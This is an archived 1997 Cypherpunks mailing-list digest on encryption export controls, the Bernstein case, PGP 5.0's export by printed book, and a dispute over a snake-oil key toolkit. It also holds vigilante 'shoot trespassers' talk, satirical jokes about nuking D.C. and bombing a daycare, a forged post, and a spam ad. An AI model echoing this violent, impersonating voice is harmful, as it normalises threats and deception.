<86c020053c190c0235375da206be6384@anon.efga.org> John Young wrote: > 29 August 1997, C4I News: > A key member of the House National Security Committee (HNSC) said > that a bill loosening export controls on U.S. encryption technology > is "dead on arrival." HNSC has until September 12 to issue > recommendations on the bill. > > "I'm not going to support something being ramrodded down our throats," > Rep.Curt Weldon said in a recent telephone interview. Rep. Weldon, I exported strong encryption today. Why? Because "I'm not going to support something being ramrodded down (my) throat." Fuck You, RamrodMonger {Don't you hate it when the 'hired hands' start getting uppity?} From mrlewis at keygen.com Fri Aug 29 07:02:31 1997 From: mrlewis at keygen.com (Myron Lewis) Date: Fri, 29 Aug 1997 22:02:31 +0800 Subject: p.s. -- Re: ASK ToolKit Clarifications In-Reply-To: <19970829133319.AAA17639@mrlewis.tiac.net> Message-ID: <3406D38B.308D@keygen.com> Myron Lewis wrote: > I know that the claims we make for the ASK ToolKit(TM) sound a little too > good to be true. In fact, someone I have been talking to for a while about > other subjects and who I thought respected my views told me that "If it > sounds too good to be true, it probably is-- too good to be true. " I forgot to mention...it can also be used to break PGP encryption. Moron Lewis President KeyGun Corporation The Key to Secure Communications(TM) Root Password: KeyGun --------------------------------------------------------------------- This post is copyrighted under the auspices of the Electronic Forgery Foundation. Any abuse of this post is fully expected and acceptable. "Twisting the words of others, since 10 o'clock this morning." --------------------------------------------------------------------- From amp at pobox.com Fri Aug 29 07:37:51 1997 From: amp at pobox.com (amp at pobox.com) Date: Fri, 29 Aug 1997 22:37:51 +0800 Subject: Aussies discover regulatory arbitrage... In-Reply-To: Message-ID: =snip= > ATO urges no Internet slug > > _By Hans van Leeuwen_ > > The Australian Tax Office's attempt to tax electronic commerce should > include no new taxes and as little extra red tape as possible, > according to the recommendations of a major ATO report to be released > today. > =snip= > "As the Internet allows electronic payment system providers to locate > their operations anywhere in the world, they might choose to flee a > jurisdiction that unilaterally introduces a strong regulatory regime . > . . Unilateral action may be more damaging than no action," the report > said. Duh. =snip= > "There are not too many existing taxes worldwide that are not > vulnerable," the Tax Commissioner, Mr Michael Carmody, said yesterday. > > The recommendations to strengthen the tax policing of the Internet > included: > * Numbers displayed on websites. > * Licence commercial internet sites ("webshops") and webshop hosts. > * Introduce denomination limits for electronic cash, like those > already existing for physical cash. > * Review the current wholesale sales tax categories, given that new > products were being thrown up by the process of digitisation. They don't seem to realize yet that it is about as easy to run a website hosted 5000K away as one down the street. This is fundamental. Some countries =will= attempt to regulate this commerce. I would be absolutely amazed if this were not so. The wonderful thing about this though is that it is just too damn easy to move a web site offshore to a location more friendly to commerce, so they will ultimately fail. The bad part about this is that there are few, if any restraining forces on government action in most places. Therefore, it is likely that any attempts to regulate internet commerce will be enforced for far longer than any person with a brain would continue to do to. Additionally, many companies will cave to the demands of whatever the jack-booted thugs demand so as to avoid harassment. > But Mr Carmody ruled out introducing any taxes on data flows, such as > a bit tax, in the short term. The last 4 words here are what is important. Why they think things will get better for them is beyond me. The ability to route around damage (in this case, taxes) is the strong point of the net. With any luck, this will continue to be true. > "We don't see major advantages to that at the moment. For Australia to > jump immediately to a bit tax would just drive Australian business out > of the country," he said. Again, DUH. > The report said electronic commerce threw up some tough challenges to > tax administrations, including the difficulty in identifying the > parties to an electronic transaction, the ability of cyber- businesses > to store records offshore and encrypt them, and the removal of "middle > men" -- such as wholesalers and brokers -- from the distribution > process, who usually make the ATO's tracking of transactions easier. > > But Mr Carmody said the ATO would not be assuming that the reason > businesses went online was to avoid tax. Yet. > "It's just another medium of transacting business, which does not of > itself say they're not going to meet their tax obligations," he said. > "But there are concerns that the Internet opens up wider fields for > those who are seeking to avoid their liabilities." Don't you just love the way they try to make confiscatory taxes seem like the most natural and patriotic thing in the universe? <:) ------------------------ Name: amp E-mail: amp at pobox.com Date: 08/29/97 Time: 08:59:25 Visit me at http://www.pobox.com/~amp == -export-a-crypto-system-sig -RSA-3-lines-PERL #!/bin/perl -sp0777i Have you ever wanted to contact a celebrity? Ever wanted your favorite celebrity to send you a personalized autographed picture? If you have, then you will need this list. It is a list of over 5,000 celebrity addresses. And it is guaranteed that the celebrity you are looking for is on the list, or you will get your money back! You can get this complete list of over 5,000 celebrity addresses for only $5.00. My list has been used for: Autograph Collecting Fund raising Real estate sales Security system sales Fan mail/appreciation letters Birthday cards Get-well cards Speaking invitations Included is a document that explains the easiest and fastest ways to get replies from the celebrity. A list like this cannot be found for less! For $10, you can get this list sent to your email address the next day after receiving your order. For an extra $2, you can get the list mailed to your residence on a 3.5" disk. Here's how to order: If you want the list emailed to you................ Total = $10.00 If you want the list sent on a 3.5" disk.......... Total = $12.00 Please include your name, address, and be sure to include your email address. Send checks or money orders to: Jared Thorp 2141 Glendale Galleria #168 Glendale, CA 91210 From frissell at panix.com Fri Aug 29 07:57:04 1997 From: frissell at panix.com (Duncan Frissell) Date: Fri, 29 Aug 1997 22:57:04 +0800 Subject: need confirmation of DVD/CSS crack in China ... In-Reply-To: <3.0.2.32.19970828224436.0075c17c@netcom10.netcom.com> Message-ID: <3.0.2.32.19970829100820.03621278@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 12:40 AM 8/29/97 -0700, Tim May wrote: >The way it was done with DAT (Digital Audio Tape), the product similar to >DVD in so many ways, was to restrict the availability of DAT recorders >which could faithfully record the output of other DAT machines. The SCMS >system, or "Serial Copy Management System," has been in all consumer-grade >DAT machines. The DVD folks have also divided the world up into regions that use a different DVD standard (China is one all by itself) and they hope to minimize international copying. DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAbX0IVO4r4sgSPhAQEkXQQAjGoLGjPtYSKvPHy1vVhKa25A+MD6SW6F qOHr5QHSHi73XgCNe200WEMBAlE1yFVF+cfNs2ivALojEASt4PMLKzMcWB1o9dH0 i//AEf0JpVjdpJetSjunOsiwfGoE0eA45vVgYVoP3tWATtQmSoE1X/1rm2gnS30P L7TyFRbxUuw= =/gcK -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Fri Aug 29 08:22:24 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 29 Aug 1997 23:22:24 +0800 Subject: Crypto best book In-Reply-To: Message-ID: "David E. Smith" writes: > > What is the best book about cryptography ? > > Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM) > recommend Bruce Schneier's "Applied Cryptography." > > http://www.counterpane.com/applied.html Bruce did a lousy job on this book. If his is the first or the only book you read on the subject of cryptography, your knowledge base will be seriously deficient. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From trei at process.com Fri Aug 29 08:26:47 1997 From: trei at process.com (Peter Trei) Date: Fri, 29 Aug 1997 23:26:47 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708291518.IAA23272@rigel.cyberpass.net> > Date: Thu, 28 Aug 1997 18:17:09 -0500 (CDT) > From: snow > To: John Smith > Cc: cypherpunks at cyberpass.net > Subject: Re: Socio-Economic Cults (Re: Cypherpunk Cults) > Reply-to: snow > On Tue, 26 Aug 1997, John Smith wrote: "Snow" wrote: >On Tue, 26 Aug 1997, John Smith wrote: > > "William H. Geiger III" : > > >>You stole from me. > > >>*BANG* > > >>You raped my sister > > >>*BANG* > > >or threaten me or my family you have committed suicide. > > >It is a quite simple and effective philosophy: > > >"You fuck with me, my family, or my property you die. You leave me alone > > >and I leave you alone." > > >Even someone like you can understand such a philosophy. > > Well, I can't. It's very confusing. Are there judges in your > > philosophy, or do you just decide for yourself who to shoot? > > "You walked on my property." BANG. > > Works for me. You post no trespassing, I have no excuse. > > > "Your music kept me awake all night." BANG. > > Well, turn the shit down. > > > "I warned you to cut that tree down, and now it fell on my house." > > BANG. > > If the warning was issued, then *BANG*. "We, your neighbours, have decided that you're too f*cking trigger-happy. So we're solving the problem. Permanently." BANG! ------------- Peter Trei trei at process.com From trei at process.com Fri Aug 29 08:30:35 1997 From: trei at process.com (Peter Trei) Date: Fri, 29 Aug 1997 23:30:35 +0800 Subject: hello Message-ID: <199708291518.IAA14303@toad.com> > Date: Fri, 29 Aug 1997 07:19:07 -0600 > From: TruthMonger [someone wrote] > Can anybody teach me the abc's on Hacking, Cracking, Phranking, > Cryptomography, I know that to be a good hacker you have to know all, > but speciallize on one. Or do any of you are in the LA area that > willing to teach me face to face. I usually ignore people whose clue meter reads in the negative, (hint: cypherpunks want people to have *better* security, not less), but there's a long standing tradition on cpunks of being creative with other people's typos. Lets see: "Phranking" This seems to draw from the word 'franking' which is related to snail mail cancellation, and 'phreaking' which is a contraction of 'phone freaking', refering to stealing phone service. Therefore, 'phranking' must mean the art of faking stamps and postal cancellations in an effort to steal postal service. I don't think anyone on this list can help you. Ask again after the PO introduces it's 2D barcoded stamps, when the privacy implications may spark some interest (btw, I spotted something very much like this on a UPS package last night). 'Cryptomography' seems to draw from 'crypto', meaning 'secret' and 'tomography' the art of making crossectional images (tomography is the T in CAT scan). Therefore, 'cryptomography' is the art of making secret crossectional images. I think the query should have been directed to the people who make airport luggage scanners, or some very weird subset of voyeurs, not us. Peter Trei trei at process.com aka 'Etymologymonger' Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From anon at anon.efga.org Fri Aug 29 08:45:48 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 23:45:48 +0800 Subject: Krispin Preaches Revolution! Message-ID: <03534be19006e0aa4949847a944e6017@anon.efga.org> Kent Crispin wrote: > On Thu, Aug 28, 1997 at 06:17:09PM -0500, snow wrote: > > Well, the current system stinks, but enough people are buffalo'd into > > thinking that it works, so it is doubtful that it will get better. > People are not "buffalo'd" -- they are happy with a system that gives > them a good life. Therefore, it has to get worse before it gets > better. I am happy that Kent has finally realized the need to Monkey Wrench the "system" to the point where enough citizens get off of their too- comfortable asses and address the issues which are leading to an increasing number of their fellow citizens being persecuted and fucked over by the government. "Then they came for the fat-asses, and I was a fat-ass, but nobody spoke up." -Roseanne "If you want to keep people from claiming they're Jesus, you have to break a few eggs." -Janet Reno/Pontius Pilate Now that Kent has realized, like McVeigh, that "it has to get worse before it gets better," perhaps he is ready to break the Big Egg. I'll be more than happy to chip in to fill Kent's private plane with fuel, and Peter Trei is at the airport, right now, stripping the identifying numbers off of Kent's aircraft. (Ever since he started forging posts to the list, Peter's gotten really radical.) TruthMonger {Now that we've got Peter Trei forging posts and Kent Crispin is ready to nuke D.C., how long can it be before we convince Blanc to bomb a daycare center?} From dang at cnet.com Fri Aug 29 09:25:12 1997 From: dang at cnet.com (Dan Goodin) Date: Sat, 30 Aug 1997 00:25:12 +0800 Subject: Sit, Bubu. Sit! / Re: Stay issued; modified stay to follow In-Reply-To: <199708290123.SAA24903@gw.quake.net> Message-ID: <3.0.3.32.19970829090309.006bb048@cnet5.cnet.com> Hi, Dan Goodin from C|NET's NEWS.COM responding to a message you sent in response to Cindy Cohn's email announcing the stay. I'm very interested in finding out how extensively Snuffle was posted during the two-and-a-half days it was legal to do so. Do you have any idea how many sites posted it, and if it's still available online today, now that such posts are once again against the law? Please respond ASAP. Thanks, Dan Goodin 415-395-7805, x5223 dang at cnet.com At 21:37 28.08.97 -0600, you wrote: >Cindy Cohn wrote: >> >> During a conference call with counsel today, Judge Patel issued a stay of >> the injunctive relief issued in her Opinion of August 25, 1997, effective >> until September 8. > > Why are these dinosaurs fucking away perfectly good taxpayer's money >trying to shore up the walls of a crumbling civilization? > >NEWS FLASH!!! THE GENIE *WON'T* GO BACK IN THE BOTTLE > --------------------------------------- > Before the ink had dried on Judge Patel's ruling, 2,000,000 emails of >Professor Bernstein's work were on their way overseas, to every port of >call. (Courtesy of Email Blaster, that wonderful progam that tells us, >fifty times a day, how to "MAKE MONEY FA$T!!!") > >> On September 8 (or sooner if we get the papers to her) the Court she will >> issue a formal Stay Pending Appeal which will stay the injunctive relief >> issued in her Opinion of August 25, 1997, except that an injunction shall be >> reinstated to prevent the prosecution of Professor Bernstein for the >> "unlicensed export" of Snuffle 5.0 (which includes Snuffle and Unsnuffle) >> and any later versions of that program which he has developed. > > Hell, Professor Bernstein can _import_ it now! > By September 8, the program will be obsolete, having been tweaked >upward >a few generations by Iraquian programmers. I respectfully requested that >the Iraquis make any future versions of the program available to >American >youth who have to flee to Hitler's homeland with their website in order >to avoid being persecuted for their sexual predeliction. > {See - http://www.guidemag.com/newsslant/vigilante-censors.html } > >> This eliminates, at least for the meantime, the injunctive relief granted to >> Bernstein as to any other computer programs which he may have developed or >> otherwise wished to publish. It also eliminates the protections for persons >> other than Professor Bernstein. > > No it doesn't. Haven't you heard of strong crypto? > Thank you for pointing out that Phil Zimmerman wishes to protect me, >and Judge Patel wishes, on behalf of the government, to "eliminate the >protections" which strong encryptions affords me. > > The governement can't even protect themself, let alone the citizens, >as evidenced by the fact that the current sport of teenage hackers >across the nation is to send strong encryption overseas by way of the >government's email systems. (Can you say FBI? Sure you can! Can you >say IRS? Sure you can!) Yet these dweebs want to destroy an industry >that *is* capable of providing the citizens protection? (Considering >the INSLAW affair, perhaps it would be more fitting to say "destroy >_another_ industry.") > >> The government has said that it may still challenge this more limited stay >> in the 9th Circuit. Professor Bernstein may also seek relief from the stay >> from the 9th Circuit. > > I hope these idiots are having fun and making lots of money playing >their dinosaur games, because they are certainly accomplishing the >opposite of what they claim to be trying to do. > The most that the dinosaurs in D.C. can manage to do, is to drag all >of the American business interests down into the ashes of history with >them as they attempt to build an Electromagnetic Curtain behind which >to imprison their citizens. > Well, the CypherPunks were digging tunnels before the government even >knew they were predestined to build the Wall, so the fascist censors are >sucking hind-tit and will, in all likelihood, continue to do so. > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >TruthMonger, CoE >Official Spokesperson for: >Cypherpunks Cult of One, >DoWell, Saskatchewan Division > >"Give me bandwidth, or give me death." > -Admiral B. d'Shauneaux >"The Xenix Chainsaw Massacre" >http://bureau42.base.org/public/xenix >"WebWorld & the Mythical Circle of Eunuchs" >http://bureau42.base.org/public/webworld > > > From amp at pobox.com Fri Aug 29 09:26:15 1997 From: amp at pobox.com (amp at pobox.com) Date: Sat, 30 Aug 1997 00:26:15 +0800 Subject: Encryption: yet another reason Message-ID: Yet another reason why we need ubiquitous strong encryption... >From The Wall Street Journal Law: News Concern Denies Allegations It Spied On Pager Messages NEW YORK -- Breaking News Network of Fort Lee, N.J., denied prosecutors' allegations that it illegally intercepted sensitive pager messages intended for New York City officials. Carl Rowan Jr., an attorney for the company, said the concern will fight the charges, announced Wednesday by Mary Jo White, Manhattan's U.S. attorney. Mr. Rowan said the company believes two former volunteers fabricated information that led to the prosecutors' charges. Breaking News said it uses a network of volunteers to listen to police scanners and other public radio traffic. The company then distributes information, such as the locations of fire and police activity, to news organizations paying for the service. "The company is absolutely outraged at how it has been treated and believes that what is really involved here is an effort to intimidate and embarrass a news-gathering organization," Mr. Rowan said. According to a complaint unsealed this week, Breaking News and people affiliated with the company allegedly used tracking software and a "cloned" police pager to illegally tap into alphanumeric messages sent to high-ranking police, fire-department and city officials. ------------------------ Name: amp E-mail: amp at pobox.com Date: 08/29/97 Time: 11:12:34 Visit me at http://www.pobox.com/~amp == -export-a-crypto-system-sig -RSA-3-lines-PERL #!/bin/perl -sp0777i Message-ID: <6505af8dd17ad60b22f26d149298cf73@anon.efga.org> The "cypherpunks" liberate PGP Yves Eudes ENCRYPTION. At the occasion of Hacking in Progress 97, the large congress of information pirates which has been taking place in Almere (Netherlands), a group of militant hackers has imported the latest version of the PGP encryption software to europe, evading the restrictive measures of the American goverment. PHILIP Zimmermann, author of the celebrated encryption software Pretty Good Privacy (PGP) has once more defied the American authorities who have been preventing him from exporting his program for years for reasons of national security (see "Monde T�l�vision-Radio-Multim�dia", 17-18 March 1996). Since 11 August, the new version (5.0) of PGP is freely available in Europe, thanks to the ruse of a team of Euro-American "cypherpunks" (1), militants devoted to the defense of the secrecy of the mails on the Internet. A few weeks ago, the US goverment authorised a limited distribution of PGP to the foreign brances of American companies (Le Monde of 4-7-97): a theoretical desision, since the different versions of PGP are already circulating in the whole world, more or less legally. Be that as it may, the militant cypherpunks do not care about these half measures for commercial purposes, coming after years of legal harrassment. To once more show the futility of the restrictions, they have decided to distribute PGP in Europe, this time legally, thanks to a legal trick. In fact, even if the exportation in electronic form (Internet or CD-ROM) remains subject to control, a federal judge has recently decided that software source code, when printed in a book, may be freely circulated, including outside the United States. Thus, the militants' trick consisted of printing the source code of PGP 5.0 in the United States, which took up twelve gross volumes, and then proceeding to Europe, carrying the books in their suitcases. There, eighty volunteers in several teams mainly based in Norway and the Netherlands, have skimmed through all of it, then scanned it page by page before finally re-creating an electronic version of the source code and then reconstructing the software. This exhausting work was achieved on Monday 11 August at four in the morning by a small group of militants piled up in a camping tent in the wood of Alemre, near Amsterdam, where HIP 97 (Hacking in Progress), the largest congress of information pirates ever organized in Europe, had been taking place for three days in open air. In spite of the late hour, the news of the installation of PGP on a European server (suitated in Norway) was saluted by an ovation that made the wood tremble, a deluge of music, bonfires, and carrying on the libations that had begun late in the evening. Then the news was distributed on the Internet by some one thousand computers at HIP 97 placed in the grass. The new PGP is equipped with a graphical interface very easy to use even by bedinners. Versions for Windows 95 and MacIntosh, integrable to the most current electronic mail software, will soon be brought to circulation. Philip Zimmermann also takes the credit for creating a general dictionary, open to all, of the "global community of PGP users". From shamrock at netcom.com Fri Aug 29 09:44:17 1997 From: shamrock at netcom.com (Lucky Green) Date: Sat, 30 Aug 1997 00:44:17 +0800 Subject: p.s. -- Re: ASK ToolKit Clarifications In-Reply-To: <19970829133319.AAA17639@mrlewis.tiac.net> Message-ID: <3.0.2.32.19970829091223.0072c1bc@netcom10.netcom.com> At 07:50 AM 8/29/97 -0600, Myron Lewis wrote: >Myron Lewis wrote: >> I know that the claims we make for the ASK ToolKit(TM) sound a little too >> good to be true. In fact, someone I have been talking to for a while about >> other subjects and who I thought respected my views told me that "If it >> sounds too good to be true, it probably is-- too good to be true. " > >I forgot to mention...it can also be used to break PGP encryption. When making such strong claims, it would behoove the author to provide an example. Until such time, the ASK toolkit will be justly regarded as snakeoil. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From kent at songbird.com Fri Aug 29 09:52:12 1997 From: kent at songbird.com (Kent Crispin) Date: Sat, 30 Aug 1997 00:52:12 +0800 Subject: Krispin Preaches Revolution! In-Reply-To: <03534be19006e0aa4949847a944e6017@anon.efga.org> Message-ID: <19970829093945.49609@bywater.songbird.com> On Fri, Aug 29, 1997 at 11:19:32AM -0400, Anonymous wrote: > Kent Crispin wrote: > > On Thu, Aug 28, 1997 at 06:17:09PM -0500, snow wrote: > > > Well, the current system stinks, but enough people are buffalo'd into > > > thinking that it works, so it is doubtful that it will get better. > > > People are not "buffalo'd" -- they are happy with a system that gives > > them a good life. Therefore, it has to get worse before it gets > > better. > > I am happy that Kent has finally realized the need to Monkey Wrench > the "system" to the point where enough citizens get off of their too- > comfortable asses and address the issues which are leading to an > increasing number of their fellow citizens being persecuted and fucked > over by the government. I have known since I was a grasshopper that people trying to effect change have a vested interest in making current reality look bad. People entrenched in the power structure, on the other hand, have a vested interest in making current reality look good. This is an interesting competition for observers, bystanders, and citizens. If the power structure is flexible, and incorporates changes that are viewed favorably by the citizens, then the power structure "wins". But so do the citizens. When change doesn't happen, or especially when it goes in a direction undesired by the revolutionaries, but liked by the citizens, the effort to make current reality look bad intensifies. When change irrevocably passes to an unwanted state, and the revolutionaries "lose", a residue of Bitter Old Revolutionary Extremists (BOREs) results. These toothless old tigers, clinging to their youthful dreams, rage at a reality that passed them by. Snarling and perpetually misunderstood, they wither and waste away, Cheshire cat evil grimace postcripts to history. > {Now that we've got Peter Trei forging posts and Kent Crispin is ready > to nuke D.C., how long can it be before we convince Blanc to bomb a > daycare center?} I can't speak for Peter or Blanc. I have no desire to nuke anyone. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From nobody at REPLAY.COM Fri Aug 29 09:53:32 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 30 Aug 1997 00:53:32 +0800 Subject: Stealth Helicopters Message-ID: <199708291645.SAA06822@basement.replay.com> > "Like them new Stealth Helicopters, equipped with devices to drown out > the sound." Or very quiet private jets. I saw a small, unmarked jet plane tailing and tracking an urban police helicopter just the other night while out on a walk in a deserted commercial district. Its light signature resembled Vader's Imperial Shuttle, incidentally. -THE LIE From ericm at lne.com Fri Aug 29 10:05:17 1997 From: ericm at lne.com (Eric Murray) Date: Sat, 30 Aug 1997 01:05:17 +0800 Subject: p.s. -- Re: ASK ToolKit Clarifications In-Reply-To: <3.0.2.32.19970829091223.0072c1bc@netcom10.netcom.com> Message-ID: <199708291654.JAA12979@slack.lne.com> Lucky Green writes: > > At 07:50 AM 8/29/97 -0600, Myron Lewis wrote: > >Myron Lewis wrote: > >> I know that the claims we make for the ASK ToolKit(TM) sound a little too > >> good to be true. In fact, someone I have been talking to for a while about > >> other subjects and who I thought respected my views told me that "If it > >> sounds too good to be true, it probably is-- too good to be true. " > > > >I forgot to mention...it can also be used to break PGP encryption. > > When making such strong claims, it would behoove the author to provide an > example. Check the headers. The one you're replying to was a forgery. > Until such time, the ASK toolkit will be justly regarded as snakeoil. >From the description, it sounds like a fancy API for a PRNG. Not snakeoil, but not all that useful either. -- Eric Murray Chief Security Scientist N*Able Technologies www.nabletech.com (email: ericm at lne.com or nabletech.com) PGP keyid:E03F65E5 From tcmay at got.net Fri Aug 29 10:08:46 1997 From: tcmay at got.net (Tim May) Date: Sat, 30 Aug 1997 01:08:46 +0800 Subject: Phranking and Cryptomography In-Reply-To: <19970829122024.21123.qmail@nym.alias.net> Message-ID: At 5:20 AM -0700 8/29/97, Feanor wrote: >On Aug 28, 22:22, Alexis wrote: >} Subject: hello >> hello, >> >> Can anybody teach me the abc's on Hacking, Cracking, Phranking, >> Cryptomography, I know that to be a good hacker you have to know all, >> but speciallize on one. Or do any of you are in the LA area that >> willing to teach me face to face. > >Boy, you're a fucking loser. > >Hacking = expert/geeky computer usage. >Cracking = breaking into computer systams. >Phranking = some stupid fucking word you made up. >Cryptomography = some other stupid fucking word you made up. Actually, these last two words are well-established, at least in some circles of hackers. "Phranking" is a combination of "Phrack" and "franking," and is the hacking of digital postage systems. "Cryptomography" is a chiefly British term, and refers to the combination of cryptography, chromatography, and mammography. The intended meaning should be clear from this. (Hint: think of disappearing writing and getting your tits in a wringer.) --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jholt at intrcom.com Fri Aug 29 10:09:59 1997 From: jholt at intrcom.com (Jack Holt) Date: Sat, 30 Aug 1997 01:09:59 +0800 Subject: Greetings, Message-ID: <199708291718.MAA01461@gatekeeper.intrcom.com> Hello, I would like some information about offshore banking and opening a checking account. Thank you. Jack Holt 1004 Lakewood St. Ozark,Mo. 65721 U.S.A. Phone no. 417-485-7038 email jholt at intrcom.com I am interested in a checking account. From hallam at ai.mit.edu Fri Aug 29 10:10:24 1997 From: hallam at ai.mit.edu (Phillip Hallam-Baker) Date: Sat, 30 Aug 1997 01:10:24 +0800 Subject: ASK ToolKit Clarifications Message-ID: <01BCB47B.90764B60.hallam@ai.mit.edu> For my comments on snakeoil see: http://crecy.ai.mit.edu/snakeoil/ Follow the navigation bars through 'key distribution" to "Monkey Wrench" Despite the hype KeyGen does not "throw a monkey wrench" into anything. It is unfortunately nothing particularly new. It is simply an example of the type of technique that is commonly used in conjunction with a public key system to keep keying material fresh while avoiding additional public key exchanges. >Unfortunately, I cannot talk about those things that are being patented, but >maybe in the near future. I hope you are not about to claim a patent on the use of one way hash functions to create keying material. I have prior art on that dating back to 1993 and I wasn't the first to discover it by a very long chalk. I suspect that the internals of Photuris probably contains most of the KeyGen proposal. >The keys are both random and unpredictable -- meaning that you will not be >able to deduce what the next key is even if you have any key that was used >in the past. The system does not depend on the secrecy of internal >algorithms for security. What about hard coded internal parameters? If you can avoid the need for an initial insecure exchange your magic box means you don't need the synchronisation technique at all. >We are not blindly implying that applications using the ASK ToolKit are >unbreakable. However, the toolkit provides the means for intrusion >detection and prevention. We know of no method this simple that does that. I know of many, the problem is that most of them arn't much good. The only exceptionaly simple schemes I know are Diffie Helleman and RSA. D-H is certainly simple. It is astonishingly simple in fact and much easier to explain to someone than MD5 or SHA. >The toolkit provides a number of bells and whistles to allow the developer >of an appliction using it to do many things like change keys as often as >wanted -- even every bit (not practical) or re-synchronize (which is >different from re-initializing). It also allows the last session >information to either be stored in encrypted form on the machine or removed >to a portable medium. OK how about the symmetric key exchange system from Shen? You already have exchanged a private key S beteeen the parties (e.g. used public key or you have a password established). You don't want to exchange the password over the wire en-clair of course. Nor do you wish to use the shared secret as the encryption key over long periods of time. One option is for party Alice to chose a random session mask M and send Bob M, The session key is then K = M XOR S. If the encryption system used is secure both parties can use the derrived session key without problems. A better solution however is for Alice to chose a random token R and send Hash (K, R), R to Bob. She can also use the XOR mask trick as well to decouple key exchange and session key choice. This is a massive advantage if the text you want to exchange has already been encrypted. i.e. we calculate M = K XOR S rather than chosing M at random. >The ToolKit does not provide the initial strong authentication needed to >start the process off. There are many very good methods for doing this, so >why should we bother. BECAUSE YOU GREAT PUDDING HEAD THAT IS THE ONLY HARD PART. Techniques to keep symmetric key material fresh indefinitely have been known for years. Kerberos is full of them. So incidentaly is Windows NT which happens to have a lot of similar ideas at least with respect to authentication. The GSSAPI probably has the same stuff burried inside it somewhere. >The claims we make are not so much for the ToolKit itself but for the >applications that we envision can be developed given the ingenuity of the >developer. We invite everyone who has a genuine interest in possibly >using the ToolKit, >and who is not just tossing flame about, to contact us with their questions. >If you are a responsible consultant or represent a responsible organization >and can sign an NDA, then we would be glad to fill in the details. This is the whole big problem. Most people I know who are interested in security worry about the competence of their security expert. So the obvious thing to do is to hire another security expert to audit their work. That is not possible if there are NDAs. Signing an NDA to not reveal source code is one thing, signing one to not use a mechanism is quite another. The capabilities you describe can be easily performed using conventional techniques. The only case in which NDAs normally come up in security work is when actual source code is being exchanged. Even then the norm is for the provider of the security toolkit to be providing their their trade secret source to the purchaser rather than this happening the other way round. As for licensing terms that relate to the utility of the functionality rather than the cost of doing the work these tend to be limited to cases where the selling party has an established product of known quality protected by credible patents. Jim Bizdos meets these criteria, you do not. Phill From shamrock at netcom.com Fri Aug 29 10:36:20 1997 From: shamrock at netcom.com (Lucky Green) Date: Sat, 30 Aug 1997 01:36:20 +0800 Subject: Goodlatte: Internet challenge to sovereignity Message-ID: <3.0.2.32.19970829102755.0072c184@netcom10.netcom.com> >From a post to FC: >At the computer in a Roanoke County library on Tuesday, Goodlatte searched >the World Wide Web for casino home pages to bolster his point. Several dozen >popped up. > >"This is a $200-million-a-year business that could grow to $1 billion in >the next >few years," he said. "The Internet is a challenge to the sovereignty of >civilized >states and nations to decide what is appropriate and decent behavior." Oh really? What a pitty. :-) --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From EHaile at aol.com Fri Aug 29 11:00:44 1997 From: EHaile at aol.com (EHaile at aol.com) Date: Sat, 30 Aug 1997 02:00:44 +0800 Subject: info Message-ID: <970829135135_-267190676@emout06.mail.aol.com> Please send more details...thanks From jya at pipeline.com Fri Aug 29 11:30:28 1997 From: jya at pipeline.com (John Young) Date: Sat, 30 Aug 1997 02:30:28 +0800 Subject: Snuffle Availability Message-ID: <1.5.4.32.19970829180857.00e5ebd8@pop.pipeline.com> Dan Bernstein's 1990 version of Snuffle posted to sci.crypt remains available: ftp://coast.cs.purdue.edu/pub/tools/unix/snuffle.shar From rah at shipwright.com Fri Aug 29 11:32:55 1997 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 30 Aug 1997 02:32:55 +0800 Subject: Shrinks as Narcs for the State In-Reply-To: <367844640a2083debfe1106e30cb1a81@anon.efga.org> Message-ID: At 4:27 am -0400 on 8/29/97, Anonymous wrote: > We are not asking you to do anything illegal, only to prioritize > your legally sworn duties in a manner which could prove to be very > mutually beneficial for both law enforcement and private enterprise. Haiku, that last sentence was. Excising the 'very mutually', might help in the rewrite, though... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From attila at hun.org Fri Aug 29 11:49:54 1997 From: attila at hun.org (Attila T. Hun) Date: Sat, 30 Aug 1997 02:49:54 +0800 Subject: H/W v S/W encryption Constitutional challenge --The Next Generation In-Reply-To: <3.0.2.32.19970828200538.02f513ec@popd.ix.netcom.com> Message-ID: <199708291829.MAA20468@infowest.com> on or about 970828:2005 Bill Stewart expostulated: +At 03:50 PM 8/26/97 +0000, Attila T. Hun wrote: +> IM[NSH]O, we need a test case that _differentiates_ between +> hardware encryption engines and _software_for_encryption (not to be +> confused with firmware). Patel rendered an important decision, but +> she refrained from establishing national jurisdiction; our only hope +> in this instance is further citations as to relevance. +I disagree. We'd lose, and setting bad precedent is worse than none or +weak precedents. The important conclusion Judge Patel drew was that +source code is clearly speech (yay! and blatantly obvious, as well 